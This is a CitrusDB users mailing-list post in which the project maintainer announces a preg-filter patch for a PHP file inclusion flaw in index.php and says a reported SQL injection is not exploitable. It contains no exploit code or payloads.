There is a vulnerability in citrus that can be patched by adding a preg filter around line 99 of the index.php file that will prevent the php file inclusion vulnerability. This vulnerability is only exploitable to users already logged into citrus.
http://bazaar.launchpad.net/~paul-citrusdb/citrusdb/gpg/revision/417/index.php The SQL injection vulnerability is not exploitable because the injected code is filtered out before it gets to that database query. The preg filter will be included in the next release of citrus, which I hope to get online soon. http://seclists.org/bugtraq/2012/Apr/53 Paul -- The CitrusDB Project | http://www.citrusdb.org Open Source Customer Care & Billing System ------------------------------------------------------------------------------ Live Security Virtual Conference Exclusive live event will cover all the ways today's security and threat landscape has changed and how IT managers can respond. Discussions will include endpoint security, mobile security and the latest in malware threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ _______________________________________________ Citrusdb-users mailing list Citrusdb-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/citrusdb-users